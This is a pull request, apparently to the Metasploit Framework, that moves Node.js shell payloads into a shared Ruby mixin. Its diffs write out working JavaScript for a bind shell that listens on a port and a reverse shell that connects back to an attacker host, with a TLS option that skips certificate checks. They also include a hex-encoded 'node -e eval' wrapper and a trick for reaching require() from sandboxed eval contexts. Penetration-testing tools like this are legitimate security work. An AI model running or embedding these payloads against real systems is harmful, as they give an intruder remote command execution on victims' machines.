### PR TITLE
More nodejs payloads

### DIFF
--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -1,0 +1,60 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::NodeJS
+  # Outputs a javascript snippet that spawns a bind TCP shell
+  # @return [String] javascript code that executes bind TCP payload
+  def nodejs_bind_tcp
+    cmd = <<-EOS
+      (function(){
+        var require = global.require || global.process.mainModule.constructor._load;
+        if (!require) return;
+
+        var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
+        var net = require("net"),
+            cp = require("child_process"),
+            util = require("util");
+
+        var server = net.createServer(function(socket) {  
+          var sh = cp.spawn(cmd, []);
+          socket.pipe(sh.stdin);
+          util.pump(sh.stdout, socket);
+          util.pump(sh.stderr, socket);
+        });
+        server.listen(#{datastore['LPORT']});
+      })();
+    EOS
+    cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
+  end
+
+  # Outputs a javascript snippet that spawns a reverse TCP shell
+  # @return [String] javascript code that executes reverse TCP payload
+  def nodejs_reverse_tcp
+    lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+    cmd = <<-EOS
+      (function(){
+        var require = global.require || global.process.mainModule.constructor._load;
+        if (!require) return;
+        var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
+        var net = require("net"),
+            cp = require("child_process"),
+            util = require("util"),
+            sh = cp.spawn(cmd, []);
+        var client = this;
+        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", function() {
+          client.socket.pipe(sh.stdin);
+          util.pump(sh.stdout, client.socket);
+          util.pump(sh.stderr, client.socket);
+        });
+      })();
+    EOS
+    cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
+  end
+
+  # Wraps the javascript code param in a "node" command invocation
+  # @param [String] code the javascript code to run
+  # @return [String] a command that invokes "node" and passes the code
+  def nodejs_cmd(code)
+    "node -e 'eval(\"#{Rex::Text.to_hex(code, "\\x")}\");'"
+  end
+end

--- a/lib/msf/core/payload/nodejs.rb
+++ b/lib/msf/core/payload/nodejs.rb
@@ -28,20 +28,30 @@ module Msf::Payload::NodeJS
   end
 
   # Outputs a javascript snippet that spawns a reverse TCP shell
+  # @param [Hash] opts the options to create the reverse TCP payload with
+  # @option opts [Boolean] :use_ssl use SSL when communicating with the shell. defaults to false.
   # @return [String] javascript code that executes reverse TCP payload
-  def nodejs_reverse_tcp
+  def nodejs_reverse_tcp(opts={})
+    use_ssl = opts.fetch(:use_ssl, false)
+    tls_hash = if use_ssl then '{rejectUnauthorized:false}, ' else '' end
+    net_lib = if use_ssl then 'tls' else 'net' end
     lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
+    # the global.process.mainModule.constructor._load fallback for require() is
+    # handy when the payload is eval()'d into a sandboxed context: the reference
+    # to 'require' is missing, but can be looked up from the 'global' object.
+    #
+    # however, this fallback might break in later versions of nodejs.
     cmd = <<-EOS
       (function(){
         var require = global.require || global.process.mainModule.constructor._load;
         if (!require) return;
         var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
-        var net = require("net"),
+        var net = require("#{net_lib}"),
             cp = require("child_process"),
             util = require("util"),
             sh = cp.spawn(cmd, []);
         var client = this;
-        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", function() {
+        client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
           client.socket.pipe(sh.stdin);
           util.pump(sh.stdout, client.socket);
           util.pump(sh.stderr, client.socket);

--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/nodejs'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::NodeJS
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -36,8 +38,6 @@ module Metasploit3
   end
 
   def command_string
-    payload = framework.payloads.create('nodejs/shell_bind_tcp')
-    payload.datastore.merge! datastore
-    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+    nodejs_cmd(nodejs_bind_tcp)
   end
 end

--- a/modules/payloads/singles/cmd/unix/bind_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/bind_nodejs.rb
@@ -1,0 +1,43 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Bind TCP (via nodejs)',
+      'Description' => 'Continually listen for a connection and spawn a command shell via nodejs',
+      'Author'      => 'joev',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::BindTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'node',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    super + command_string
+  end
+
+  def command_string
+    payload = framework.payloads.create('nodejs/shell_bind_tcp')
+    payload.datastore.merge! datastore
+    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+  end
+end

--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/nodejs'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::NodeJS
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -36,8 +38,6 @@ module Metasploit3
   end
 
   def command_string
-    payload = framework.payloads.create('nodejs/shell_reverse_tcp')
-    payload.datastore.merge! datastore
-    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+    nodejs_cmd(nodejs_reverse_tcp)
   end
 end

--- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb
@@ -1,0 +1,43 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'        => 'Unix Command Shell, Reverse TCP (via nodejs)',
+      'Description' => 'Continually listen for a connection and spawn a command shell via nodejs',
+      'Author'      => 'joev',
+      'License'     => MSF_LICENSE,
+      'Platform'    => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Handler'     => Msf::Handler::ReverseTcp,
+      'Session'     => Msf::Sessions::CommandShell,
+      'PayloadType' => 'cmd',
+      'RequiredCmd' => 'node',
+      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  def generate
+    super + command_string
+  end
+
+  def command_string
+    payload = framework.payloads.create('nodejs/shell_reverse_tcp')
+    payload.datastore.merge! datastore
+    "node -e 'eval(\"#{Rex::Text.to_hex(payload.generate, "\\x")}\");'"
+  end
+end

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -10,7 +10,7 @@
 # settle for just getting shells on nodejs.
 
 require 'msf/core'
-require 'msf/core/handler/reverse_tcp'
+require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -1,0 +1,68 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+# It would be better to have a commonjs payload, but because the implementations
+# differ so greatly when it comes to require() paths for net modules, we will
+# settle for just getting shells on nodejs.
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'Command Shell, Bind TCP (via nodejs)',
+      'Description'   => 'Creates an interactive shell via nodejs',
+      'Author'        => ['joev'],
+      'License'       => BSD_LICENSE,
+      'Platform'      => 'nodejs',
+      'Arch'          => ARCH_NODEJS,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShell,
+      'PayloadType'   => 'nodejs',
+      'Payload'       => { 'Offsets' => {}, 'Payload' => '' }
+    ))
+  end
+
+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
+  #
+  # Returns the JS string to use for execution
+  #
+  def command_string
+    cmd   = <<EOS
+(function(){
+  var require = global.require || global.process.mainModule.constructor._load;
+  if (!require) return;
+
+  var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
+  var net = require("net"),
+      cp = require("child_process"),
+      util = require("util");
+
+  var server = net.createServer(function(socket) {  
+    var sh = cp.spawn(cmd, []);
+    socket.pipe(sh.stdin);
+    util.pump(sh.stdout, socket);
+    util.pump(sh.stderr, socket);
+  });
+  server.listen(#{datastore['LPORT']});
+})();
+EOS
+    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+  end
+end

--- a/modules/payloads/singles/nodejs/shell_bind_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_bind_tcp.rb
@@ -10,12 +10,14 @@
 # settle for just getting shells on nodejs.
 
 require 'msf/core'
+require 'msf/core/payload/nodejs'
 require 'msf/core/handler/bind_tcp'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::NodeJS
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -44,25 +46,6 @@ module Metasploit3
   # Returns the JS string to use for execution
   #
   def command_string
-    cmd   = <<EOS
-(function(){
-  var require = global.require || global.process.mainModule.constructor._load;
-  if (!require) return;
-
-  var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
-  var net = require("net"),
-      cp = require("child_process"),
-      util = require("util");
-
-  var server = net.createServer(function(socket) {  
-    var sh = cp.spawn(cmd, []);
-    socket.pipe(sh.stdin);
-    util.pump(sh.stdout, socket);
-    util.pump(sh.stderr, socket);
-  });
-  server.listen(#{datastore['LPORT']});
-})();
-EOS
-    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+    nodejs_bind_tcp
   end
 end

--- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb
@@ -10,12 +10,14 @@
 # settle for just getting shells on nodejs.
 
 require 'msf/core'
+require 'msf/core/payload/nodejs'
 require 'msf/core/handler/reverse_tcp'
 require 'msf/base/sessions/command_shell'
 
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::NodeJS
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -44,24 +46,6 @@ module Metasploit3
   # Returns the JS string to use for execution
   #
   def command_string
-    lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
-    cmd   = <<EOS
-(function(){
-  var require = global.require || global.process.mainModule.constructor._load;
-  if (!require) return;
-  var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
-  var net = require("net"),
-      cp = require("child_process"),
-      util = require("util"),
-      sh = cp.spawn(cmd, []);
-  var client = this;
-  client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", function() {
-    client.socket.pipe(sh.stdin);
-    util.pump(sh.stdout, client.socket);
-    util.pump(sh.stderr, client.socket);
-  });
-})();
-EOS
-    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+    nodejs_reverse_tcp
   end
 end

--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@@ -6,6 +6,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/payload/nodejs'
 require 'msf/core/handler/reverse_tcp_ssl'
 require 'msf/base/sessions/command_shell'
 require 'msf/base/sessions/command_shell_options'
@@ -13,6 +14,7 @@ require 'msf/base/sessions/command_shell_options'
 module Metasploit3
 
   include Msf::Payload::Single
+  include Msf::Payload::NodeJS
   include Msf::Sessions::CommandShellOptions
 
   def initialize(info = {})
@@ -41,24 +43,6 @@ module Metasploit3
   # Returns the JS string to use for execution
   #
   def command_string
-    lhost = Rex::Socket.is_ipv6?(lhost) ? "[#{datastore['LHOST']}]" : datastore['LHOST']
-    cmd   = <<EOS
-(function(){
-  var require = global.require || global.process.mainModule.constructor._load;
-  if (!require) return;
-  var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh";
-  var tls = require("tls"),
-      cp = require("child_process"),
-      util = require("util"),
-      sh = cp.spawn(cmd, []);
-  var client = this;
-  client.socket = tls.connect(#{datastore['LPORT']}, "#{lhost}", {rejectUnauthorized:false}, function() {
-    client.socket.pipe(sh.stdin);
-    util.pump(sh.stdout, client.socket);
-    util.pump(sh.stderr, client.socket);
-  });
-})();
-EOS
-    return "#{cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')}"
+    nodejs_reverse_tcp(:use_ssl => true)
   end
 end


### PR DESCRIPTION
This time with less recursion. I have moved the nodejs payload logic into a mixin (`msf/core/payload/nodejs.rb`), which all of the related payloads use.

The following payloads now need to be verified:
- [x] `nodejs/shell_reverse_tcp`
- [x] `nodejs/shell_reverse_tcp_ssl`
- [x] `nodejs/shell_bind_tcp`
- [x] `cmd/unix/reverse_nodejs`
- [x] `cmd/unix/bind_nodejs`
